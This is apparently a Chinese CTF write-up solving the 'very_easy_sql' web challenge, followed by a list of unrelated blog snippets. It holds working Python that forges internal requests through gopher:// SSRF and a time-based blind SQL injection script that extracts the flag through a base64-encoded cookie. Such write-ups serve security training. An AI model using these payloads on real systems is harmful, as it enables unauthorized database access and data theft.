海底月@
海底月@

攻防世界 -- very_easy_sql

先看题  题目描述什么也没有

攻防世界 -- very_easy_sql_第1张图片

 点进去题目场景看看

攻防世界 -- very_easy_sql_第2张图片 you are not an inner user, so we can not let you have identify~   只能内部访问登录 

看下页面源代码



 16行 有一行注释           把use.php加到URL后边看一下 


攻防世界 -- very_easy_sql_第3张图片


 到这可以判断出是SSRF  先写个playload  实现内部访问




import urllib.parse


host = "127.0.0.1:80"
 content = "uname=admin&passwd=admin"
 content_length = len(content)


test =\
 """POST /index.php HTTP/1.1
 Host: {}
 User-Agent: curl/7.43.0
 Accept: */*
 Content-Type: application/x-www-form-urlencoded
 Content-Length: {}


{}
 """.format(host,content_length,content)


tmp = urllib.parse.quote(test) 
 new = tmp.replace("%0A","%0D%0A")
 result = urllib.parse.quote(new) 
 print("gopher://"+host+"/_"+result)
  




 攻防世界 -- very_easy_sql_第4张图片


然后用BP抓包  


攻防世界 -- very_easy_sql_第5张图片


 返回值里有一个Set-Cookie 解码看看


攻防世界 -- very_easy_sql_第6张图片


解码结果就是admin   这个cookie 就是注入点 重新写一个payload  由于无回显  现在用sleep盲注  构造语句   admin') and if(1,sleep(10),1)#  


进行编码   


攻防世界 -- very_easy_sql_第7张图片


 payload如下:




import urllib.parse


host = "127.0.0.1:80"
 cookie="this_is_your_cookie=YWRtaW4nKSBhbmQgaWYoMSxzbGVlcCgxMCksMSkj"


test =\
 """GET /index.php HTTP/1.1
 Host: {}
 Connection: close
 Content-Type: application/x-www-form-urlencoded
 Cookie:{}


""".format(host,cookie)


tmp = urllib.parse.quote(test) 
 new = tmp.replace("%0A","%0D%0A")
 result = urllib.parse.quote(new) 
 print("gopher://"+host+"/_"+result)
  




 攻防世界 -- very_easy_sql_第8张图片


 然后继续用BP抓包看看


攻防世界 -- very_easy_sql_第9张图片


构造payload脚本


import urllib.parse
import requests
import time
import base64
url="http://61.147.171.105:53185//use.php?url="
flag=""
for pos in range(1,50):
    for i in range(33,127):
        #poc="') union select 1,2,if(1=1,sleep(5),1) # "

        #security
        #poc="') union select 1,2,if(ascii( substr((database()),"+str(pos)+",1) )="+str(i)+",sleep(2),1) # "

        #flag
        #poc="') union select 1,2,if(ascii( substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(pos)+",1) )="+str(i)+",sleep(2),1) # "
        
        poc="') union select 1,2,if(ascii( substr((select * from flag),"+str(pos)+",1) )="+str(i)+",sleep(2),1) # "
        
        bs = str(base64.b64encode(poc.encode("utf-8")), "utf-8")
        final_poc="gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aCookie%3A%20this%5Fis%5Fyour%5Fcookie%3D"+bs+"%3B%250d%250a"
        t1=time.time()
        res=requests.get(url+final_poc)
        t2=time.time()
        if(t2-t1>2):
            flag+=chr(i)
            print(flag)
            break
print(flag)


python跑一下


攻防世界 -- very_easy_sql_第10张图片


 提交flag    


































你可能感兴趣的:(CTF,web安全)






    

  • ARM驱动学习之4小结
JT灬新一
嵌入式C++arm开发学习linux

    ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
    

    • 

  • react-intl——react国际化使用方案
苹果酱0567
面试题汇总与解析java开发语言中间件springboot后端

    国际化介绍i18n:internationalization国家化简称,首字母+首尾字母间隔的字母个数+尾字母,类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf
    

    • 

  • Linux CTF逆向入门
蚁景网络安全
linux运维CTF

    1.ELF格式我们先来看看ELF文件头,如果想详细了解,可以查看ELF的manpage文档。关于ELF更详细的说明:e_shoff:节头表的文件偏移量(字节)。如果文件没有节头表,则此成员值为零。sh_offset:表示了该section(节)离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
    

    • 

  • Windows安装ciphey编码工具,附一道ciscn编码题例
im-Miclelson
CTF工具网络安全

    TA是什么一款智能化的编码分析解码工具,对于CTF中复杂性编码类题目可以快速攻破。编码自动分析解码的神器。如何安装Windows环境Python3.864位(最新的版本不兼容,32位的也不行)PIP直接安装pipinstallciphey-ihttps://pypi.mirrors.ustc.edu.cn/simple/安装后若是出现报错请根据错误代码行数找到对应文件,r修改成rb即可。使用标准语
    

    • 

  • Web安全:Web体系架构存在的安全问题和解决方室
程序员-张师傅
前端安全web安全前端

    Web体系架构在提供丰富功能和高效服务的同时,也面临着诸多安全问题。这些问题可能涉及数据泄露、服务中断、系统被控制等多个方面,对企业和个人造成不可估量的损失。以下是对Web体系架构中存在的安全问题及解决方案的详细分析:Web体系架构存在的安全问题注入攻击SQL注入:攻击者通过在输入字段中插入恶意SQL代码,操控后台数据库,窃取、篡改或删除数据。OS命令注入:攻击者通过输入字段插入恶意代码,执行系统
    

    • 

  • 2005年高考英语北京卷 - 阅读理解C
让文字更美

    Howcouldwepossiblythinkthatkeepinganimalsincagesinunnaturalenvironments-mostlyforentertainmentpurposes-isfairandrespectful?我们怎么可能认为把动物关在非自然环境的笼子里——主要是为了娱乐目的——是公平和尊重的呢?Zooofficialssaytheyareconcernedab
    

    • 

  • CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移
沧海一粟日尽其用
算法安全python

    CTF-bugku-crypto-[7+1+0]-base64解码之后做偏移1.题目2.解题思路2.1base64编码原理2.2解题思路2.2.1base64解码找规律2.2.2破解思路3.解题脚本4.flag5.附EASCII码表1.题目提示信息:7+1+0?格式bugku{xxxxx}密文:4nXna/V7t2LpdLI44mn0fQ==要求:破解密文获得flag2.解题思路2.1base64
    

    • 

  • CTF常见编码及加解密(超全)第二篇
不会代码的小徐
编码密码网络安全密码学预编码

    HTML实体编码简述:字符实体是用一个编号写入HTML代码中来代替一个字符,在使用浏览器访问网页时会将这个编号解析还原为字符以供阅读。举例:highlighter-HTML明文:hello,world.十进制:hello,world.十六进制:hel
    

    • 

  • CTF——web方向学习攻略
一则孤庸
CTF网络安全CTF

    1计算机基础操作系统:熟悉Linux命令,方便使用Kali。网络技术:HCNA、CCNA。编程能力:拔高项,有更好。2web应用HTTP协议:必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题
    

    • 

  • CTF——web总结
oliveira-time
ctfweb安全

    解题思路做题先看源码关注可下载的资源(zip压缩包)抓包寻找可能存在的加密信息(base64)不管三七二十一先扫描目录再说ps:正常的应该是先扫描目录,然后发现后台进行爆破,发现爆破困难,然后去社工找其他信息。CTF——web个人总结_ctfweb-CSDN博客
    

    • 

  • VueTreeselect el-tree-select 多选
小小并不小
Vueelementjsvue.jsjavascript

    1、VueTreeselect是一个多选组件npminstall--save@riophae/vue-treeselect全部代码//importthecomponentimportTreeselectfrom'@riophae/vue-treeselect'//importthestylesimport'@riophae/vue-treeselect/dist/vue-treeselect.cs
    

    • 

  • ctf逆向解题——Bomb二进制炸弹
Funkypantss

    BombPhase1在输入阶段将由文件输入的字符存储在input中,在phase1,该阶段将原字符串存储到rdi中,调用pases_1函数进行字符串比较。image进入phase1函数,该函数将原字符串rdi与预先设定的字符串“BorderrelationswithCanadahaveneverbeenbetter.”(存储在rsi中)进行比较,用于比较的函数是strings_not_equal,
    

    • 

  • 学习笔记:FW内容安全概述
TKE_yinian

    内容安全概述信息安全概述主要威胁关于防护简介内容安全威胁应用层威胁内容安全技术WEB安全应用安全入侵防御检测邮件安全数据安全网络安全反病毒全局环境感知沙箱检测信息安全概述•信息安全是对信息和信息系统进行保护,防止未授权的访问、使用、泄露、中断、修改、破坏并以此提供保密性、完整性和可用性。•为关键资产提供机密性、完整性和可用性(CIA三元组)保护是信息安全的核心目标。CIA(Confidential
    

    • 

  • 【CTF】MISC常用工具集锦/使用方法简介
不会代码的小徐
misc网络安全测试工具

    前言#MISC题型多变而且工具繁杂,因此自己花时间整理了一份工具列表,以便日后参考用流畅地阅读这篇博客,你可能需要:Python2.7.18+Python3.8+任何一个更高版本的Python,使用conda管理Linux虚拟机,kali即可流畅访问Google/GitHub等站点的网络通用工具#PuzzleSolver#专为misc手打造的瑞士军刀(?),整合了多种脚本(base,字频分析,pn
    

    • 

  • 网络安全(黑客)自学
白帽子凯哥
web安全安全网络安全服务器网络

    一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你是一
    

    • 

  • 网络安全的相关比赛有哪些?需要掌握哪些必备技能?
网安学习
web安全安全网络安全的相关比赛有哪

    01、CTF(夺旗赛)这是一种最常见的网络安全竞技形式,要求参赛者在限定时间内解决一系列涉及密码学、逆向工程、漏洞利用、取证分析等领域的挑战,获取标志(flag)并提交得分。通过举办CTF来培养网络安全人才,已经发展成为了国际网络安全圈的共识。CTF赛事可以分为线上赛和线下赛,线上赛通常是解题模式(Jeopardy),线下赛通常是攻防模式(Attack-Defense)。CTF赛事的代表性线下赛事
    

    • 

  • 第四部分:1---文件内核对象,文件描述符,输出重定向
S+叮当猫
LinuxCentOS算法linux服务器

    目录structfile内核对象:如何读写文件?文件描述符在文件描述符表中的分配规则:输出重定向初步解析:dup2实现复制文件描述符:structfile内核对象:structfile是在内核空间中创建的用于描述文件的结构体,每当一个文件被打开时,内核会为该文件创建一个对应的structfile结构体,并在文件描述符表中为其分配一个文件描述符。基于文件的定义(文件=内容+属性),structfil
    

    • 

  • 网络攻防WEB入门指南
youhao108
网络攻防web渗透测试网络安全网络攻防

    网络攻防WEB入门指南(大佬绕路)文章目录前言学习网络攻防该如何入门前言我对网络攻防的理解,分为比赛和实战两个部分,两者所学习的知识虽有共通之处,但还是有很大区别,我也在向实战的状态转换,不过二者入门所要掌握的知识差别不大。下面主要从网络攻防竞赛角度,也就是知名的CTF夺旗赛,来谈谈网络攻防知识如何入门。学习网络攻防该如何入门常规CTF比赛主要分为线上做题,以及线下AWD攻防(AttackWith
    

    • 

  • 软考 - 系统架构设计师 - 设计模式
小林想被监督学习
系统架构设计师系统架构设计模式

    目录概念创建型设计模式抽象工厂模式(AbstractFactoryPattern)优点缺点应用场景总结构建器模式(BuilderPattern)优点缺点应用场景工厂方法模式(factorymethod)优点缺点应用场景原型模式(prototype)优点缺点应用场景单例模式(Singleton)优点缺点应用场景结构型设计模式适配器模式(Adapter)优点缺点应用场景桥接模式(Bridge)优点缺点
    

    • 

  • ctfshow web入门 ssrf web351~web360
kikkeve
ctfshowphpweb安全安全

    目录SSRF基础web351web352、353web354web355web356web357web358web359web360SSRF基础SSRF(Server-SideRequestForgery:服务器端请求伪造)就是让服务器去请求服务器的资源,因为我们远程请求不到。curl_init():初始curl会话curl_setopt():会话设置curl_exec():执行curl会话,获取
    

    • 

  • flutter 一键打出不同包名、应用名、版本名、签名、应用图标、版本号的安装包
Sindyue
flutter

    1.build.gradle文件中配置不同的应用信息flavorDimensions"app"productFlavors{app1{//配置包名manifestPlaceholders=[str:"releaseStr",package_name:"com.example.demo1"]applicationId"com.example.demo1"versionCode1versionName
    

    • 

  • CTF 竞赛密码学方向学习路径规划
David Max
CTF学习笔记密码学ctf信息安全

    目录计算机科学基础计算机科学概念的引入、兴趣的引导开发环境的配置与常用工具的安装WattToolkit(Steam++)、机场代理Scoop(Windows用户可选)常用Python库SageMathLinux小工具yafuOpenSSLMarkdown编程基础Python其他编程语言、算法与数据结构(可选)数学基础离散数学与抽象代数复杂性分析密码学的正式学习兴趣的培养做题小技巧系统学习需要了解并
    

    • 

  • 58手势验证码的分析
allgiveup

    做爬虫的小伙伴们肯定都深有体会,爬虫要是遇到验证码了基本上就是GG了。于是爬虫工作者和验证码之间必有一战。随着web安全技术的提升,验证码也一代一代的革新,并且越发的变态。小曾也去研究了各式样的验证码,最后决定拿出58手势验证码和大家分享。分析概述首先我对58手势验证码做一个总体的描述。从触发验证码到验证成功,我们操作的背后需要向服务器发送6个请求,并且还有一次js算法对参数加密。6个请求之间有着
    

    • 

  • MySQL8.0新特性~最左前缀匹配原则被打破了
进击的CJR
mysqlmysql

    测试在MySQL8.0.25和mysql5.7.33中创建如下CREATETABLEt1(f1INTNOTNULL,f2INTNOTNULL,PRIMARYKEY(f1,f2));INSERTINTOt1VALUES(1,1),(1,2),(1,3),(1,4),(1,5),(2,1),(2,2),(2,3),(2,4),(2,5);INSERTINTOt1SELECTf1,f2+5FROMt1;
    

    • 

  • web安全学习笔记(1)
头发的天敌是代码
web安全学习笔记web安全学习笔记

    一、网络安全分支1.web安全——网站2.二进制安全物联网安全工控安全二、网站是如何搭建起来的1.服务器服务器与我们的家庭使用电脑有什么区别?①没有显卡②CPU+内存不同于家庭电脑2.操作系统家庭系统:WindowsXPWindows7Windows8Windows9Windows10Windows11服务器操作系统:Windows2000Windows2003Windows2008Windows
    

    • 

  • Web安全与网络安全:SQL漏洞注入
hong161688
web安全sqloracle

    Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
    

    • 

  • Web安全与网络安全:SQL漏洞注入
bigbig猩猩
typescriptvue.js前端

    Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
    

    • 

  • hackcon ctf 2018 | pwn wp
fantasy_learner

    BOF漏洞点:栈溢出利用过程栈溢出跳转callMeMaybe函数获得flagexpSheSellsSeaShells90流程分析:给出了输入的栈地址有一个栈溢出点没有nx利用过程:根据以上三点,得出可以使用ret2shellcode使用shellcraft生成shellcode利用栈溢出,输入并跳转到shellcodeexpSimpleYetElegent150这道题目做了最久,卡在了能否根据_d
    

    • 

  • BUUCTF 2021-10-4 Pwn
Ch1lkat
BUUCTFPwnlinuxpwn

    文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffe
    

    • 

  • C# 关于多线程同步不同实现方式
語衣
C#知识补充c#开发语言

    栏目总目录AutoResetEventclassMainClass{//thearrayofconsumerthreadsprivatestaticListconsumers=newList();//thetaskqueueprivatestaticQueuetasks=newQueue();//thesynchronisationobjectforlockingthetaskqueuepriva
    

    • 

  • Dom
周华华
JavaScripthtml

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml&q
    

    • 

  • 【Spark九十六】RDD API之combineByKey
bit1129
spark

    1. combineByKey函数的运行机制
 
RDD提供了很多针对元素类型为(K,V)的API,这些API封装在PairRDDFunctions类中,通过Scala隐式转换使用。这些API实现上是借助于combineByKey实现的。combineByKey函数本身也是RDD开放给Spark开发人员使用的API之一
 
首先看一下combineByKey的方法说明:
    

    • 

  • msyql设置密码报错:ERROR 1372 (HY000): 解决方法详解
daizj
mysql设置密码

    MySql给用户设置权限同时指定访问密码时,会提示如下错误:
ERROR 1372 (HY000): Password hash should be a 41-digit hexadecimal number;
 
问题原因:你输入的密码是明文。不允许这么输入。
 
解决办法:用select password('你想输入的密码');查询出你的密码对应的字符串,
然后
    

    • 

  • 路漫漫其修远兮 吾将上下而求索
周凡杨
学习 思索

    王国维在他的《人间词话》中曾经概括了为学的三种境界古今之成大事业、大学问者,罔不经过三种之境界。“昨夜西风凋碧树。独上高楼,望尽天涯路。”此第一境界也。“衣带渐宽终不悔,为伊消得人憔悴。”此第二境界也。“众里寻他千百度,蓦然回首,那人却在灯火阑珊处。”此第三境界也。学习技术,这也是你必须经历的三种境界。第一层境界是说,学习的路是漫漫的,你必须做好充分的思想准备,如果半途而废还不如不要开始。这里,注
    

    • 

  • Hadoop(二)对话单的操作
朱辉辉33
hadoop

    Debug:
1、
A = LOAD '/user/hue/task.txt' USING PigStorage(' ')
AS (col1,col2,col3);
DUMP A;
//输出结果前几行示例:
(>ggsnPDPRecord(21),,)
(-->recordType(0),,)
(-->networkInitiation(1),,)

    

    • 

  • web报表工具FineReport常用函数的用法总结(日期和时间函数)
老A不折腾
finereport报表工具web开发

    web报表工具FineReport常用函数的用法总结(日期和时间函数)
 
说明:凡函数中以日期作为参数因子的,其中日期的形式都必须是yy/mm/dd。而且必须用英文环境下双引号(" ")引用。
 
DATE
DATE(year,month,day):返回一个表示某一特定日期的系列数。
Year:代表年,可为一到四位数。
Month:代表月份。
    

    • 

  • c++ 宏定义中的##操作符
墙头上一根草
C++

    #与##在宏定义中的--宏展开 #include <stdio.h> #define f(a,b) a##b #define g(a)   #a #define h(a) g(a) int main() {       &nbs
    

    • 

  • 分析Spring源代码之,DI的实现
aijuans
springDI源代码

    (转)
分析Spring源代码之,DI的实现
2012/1/3 by tony
                接着上次的讲,以下这个sample
[java] 
view plain
copy
print

    

    • 

  • for循环的进化
alxw4616
JavaScript

    // for循环的进化
// 菜鸟
for (var i = 0; i < Things.length ; i++) {
// Things[i]
}
// 老鸟
for (var i = 0, len = Things.length; i < len; i++) {
// Things[i]
}
// 大师
for (var i = Things.le
    

    • 

  • 网络编程Socket和ServerSocket简单的使用
百合不是茶
网络编程基础IP地址端口

     
网络编程;TCP/IP协议
 
网络:实现计算机之间的信息共享,数据资源的交换
 
协议:数据交换需要遵守的一种协议,按照约定的数据格式等写出去
 
端口:用于计算机之间的通信
     每运行一个程序,系统会分配一个编号给该程序,作为和外界交换数据的唯一标识
0~65535
 
查看被使用的
    

    • 

  • JDK1.5 生产消费者
bijian1013
javathread生产消费者java多线程

    ArrayBlockingQueue:
       一个由数组支持的有界阻塞队列。此队列按 FIFO(先进先出)原则对元素进行排序。队列的头部 是在队列中存在时间最长的元素。队列的尾部 是在队列中存在时间最短的元素。新元素插入到队列的尾部,队列检索操作则是从队列头部开始获得元素。
ArrayBlockingQueue的常用方法:

    

    • 

  • JAVA版身份证获取性别、出生日期及年龄
bijian1013
java性别出生日期年龄

            工作中需要根据身份证获取性别、出生日期及年龄,且要还要支持15位长度的身份证号码,网上搜索了一下,经过测试好像多少存在点问题,干脆自已写一个。
CertificateNo.java
package com.bijian.study;
import java.util.Calendar;
import 
    

    • 

  • 【Java范型六】范型与枚举
bit1129
java

    首先,枚举类型的定义不能带有类型参数,所以,不能把枚举类型定义为范型枚举类,例如下面的枚举类定义是有编译错的
 
public enum EnumGenerics<T> { //编译错,提示枚举不能带有范型参数
OK, ERROR;
public <T> T get(T type) {
return null;

    

    • 

  • 【Nginx五】Nginx常用日志格式含义
bit1129
nginx

    1. log_format
1.1 log_format指令用于指定日志的格式,格式:
 
log_format name(格式名称) type(格式样式)
 
1.2 如下是一个常用的Nginx日志格式:
 
log_format main '[$time_local]|$request_time|$status|$body_bytes
    

    • 

  • Lua 语言 15 分钟快速入门
ronin47
lua 基础

    -
-
单行注释
-
-
[[
    
[多行注释]
-
-
]]  
-
-
-
-
-
-
-
-
-
-
-
1.
变量 & 控制流
-
-
-
-
-
-
-
-
-
-
num
=
23
-
-
数字都是双精度
str
=
'aspythonstring'

    

    • 

  • java-35.求一个矩阵中最大的二维矩阵 ( 元素和最大 )
bylijinnan
java

    the idea is from:
http://blog.csdn.net/zhanxinhang/article/details/6731134
public class MaxSubMatrix {
/**see http://blog.csdn.net/zhanxinhang/article/details/6731134
* Q35
求一个矩阵中最大的二维
    

    • 

  • mongoDB文档型数据库特点
开窍的石头
mongoDB文档型数据库特点

    MongoDD: 文档型数据库存储的是Bson文档-->json的二进制
特点:内部是执行引擎是js解释器,把文档转成Bson结构,在查询时转换成js对象。
mongoDB传统型数据库对比
   传统类型数据库:结构化数据,定好了表结构后每一个内容符合表结构的。也就是说每一行每一列的数据都是一样的
   文档型数据库:不用定好数据结构,
    

    • 

  • [毕业季节]欢迎广大毕业生加入JAVA程序员的行列
comsci
java

    
    一年一度的毕业季来临了。。。。。。。。
     正在投简历的学弟学妹们。。。如果觉得学校推荐的单位和公司不适合自己的兴趣和专业,可以考虑来我们软件行业,做一名职业程序员。。。
     软件行业的开发工具中,对初学者最友好的就是JAVA语言了,网络上不仅仅有大量的
    

    • 

  • PHP操作Excel – PHPExcel 基本用法详解
cuiyadll
PHPExcel

    导出excel属性设置//Include classrequire_once('Classes/PHPExcel.php');require_once('Classes/PHPExcel/Writer/Excel2007.php');$objPHPExcel = new PHPExcel();//Set properties 设置文件属性$objPHPExcel->getProperties
    

    • 

  • IBM Webshpere MQ Client User Issue (MCAUSER)
darrenzhu
IBMjmsuserMQMCAUSER

    IBM MQ JMS Client去连接远端MQ Server的时候,需要提供User和Password吗?
答案是根据情况而定,取决于所定义的Channel里面的属性Message channel agent user identifier (MCAUSER)的设置。
http://stackoverflow.com/questions/20209429/how-mca-user-i
    

    • 

  • 网线的接法
dcj3sjt126com

    一、PC连HUB (直连线)A端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 B端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 二、PC连PC (交叉线)A端:(568A): 白绿,绿,白橙,蓝,白蓝,橙,白棕,棕; B端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 三、HUB连HUB&nb
    

    • 

  • Vimium插件让键盘党像操作Vim一样操作Chrome
dcj3sjt126com
chromevim

    什么是键盘党?
键盘党是指尽可能将所有电脑操作用键盘来完成,而不去动鼠标的人。鼠标应该说是新手们的最爱,很直观,指哪点哪,很听话!不过常常使用电脑的人,如果一直使用鼠标的话,手会发酸,因为操作鼠标的时候,手臂不是在一个自然的状态,臂肌会处于绷紧状态。而使用键盘则双手是放松状态,只有手指在动。而且尽量少的从鼠标移动到键盘来回操作,也省不少事。
在chrome里安装 vimium 插件

    

    • 

  • MongoDB查询(2)——数组查询[六]
eksliang
mongodbMongoDB查询数组

    MongoDB查询数组
转载请出自出处:http://eksliang.iteye.com/blog/2177292 一、概述
 MongoDB查询数组与查询标量值是一样的,例如,有一个水果列表,如下所示:
> db.food.find()
{ "_id" : "001", "fruits" : [ "苹
    

    • 

  • cordova读写文件(1)
gundumw100
JavaScriptCordova

    使用cordova可以很方便的在手机sdcard中读写文件。
首先需要安装cordova插件:file
命令为:
cordova plugin add org.apache.cordova.file
然后就可以读写文件了,这里我先是写入一个文件,具体的JS代码为:
var datas=null;//datas need write
var directory=&
    

    • 

  • HTML5 FormData 进行文件jquery ajax 上传 到又拍云
ileson
jqueryAjaxhtml5FormData

    html5 新东西:FormData  可以提交二进制数据。
页面test.html
<!DOCTYPE>
<html>
<head>
<title> formdata file jquery ajax upload</title>
</head>
<body>
<
    

    • 

  • swift appearanceWhenContainedIn:(version1.2 xcode6.4)
啸笑天
version

     
swift1.2中没有oc中对应的方法:
+ (instancetype)appearanceWhenContainedIn:(Class <UIAppearanceContainer>)ContainerClass, ... NS_REQUIRES_NIL_TERMINATION;
 解决方法:
在swift项目中新建oc类如下:
#import &
    

    • 

  • java实现SMTP邮件服务器
macroli
java编程

    电子邮件传递可以由多种协议来实现。目前,在Internet 网上最流行的三种电子邮件协议是SMTP、POP3 和 IMAP,下面分别简单介绍。
  ◆ SMTP 协议
  简单邮件传输协议(Simple Mail Transfer Protocol,SMTP)是一个运行在TCP/IP之上的协议,用它发送和接收电子邮件。SMTP 服务器在默认端口25上监听。SMTP客户使用一组简单的、基于文本的
    

    • 

  • mongodb group by having where 查询sql
qiaolevip
每天进步一点点学习永无止境mongo纵观千象

    SELECT cust_id,
SUM(price) as total
FROM orders
WHERE status = 'A'
GROUP BY cust_id
HAVING total > 250
db.orders.aggregate( [
{ $match: { status: 'A' } },
{
$group: {

    

    • 

  • Struts2 Pojo(六)
Luob.
POJOstrust2

    注意:附件中有完整案例
1.采用POJO对象的方法进行赋值和传值
2.web配置
<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.5"
xmlns="http://java.sun.com/xml/ns/javaee&q
    

    • 

  • struts2步骤
wuai
struts

    1、添加jar包
2、在web.xml中配置过滤器
<filter>
       <filter-name>struts2</filter-name>
       <filter-class>org.apache.st
    

    • 














按字母分类:
ABCDEFGHIJKLMNOPQRSTUVWXYZ其他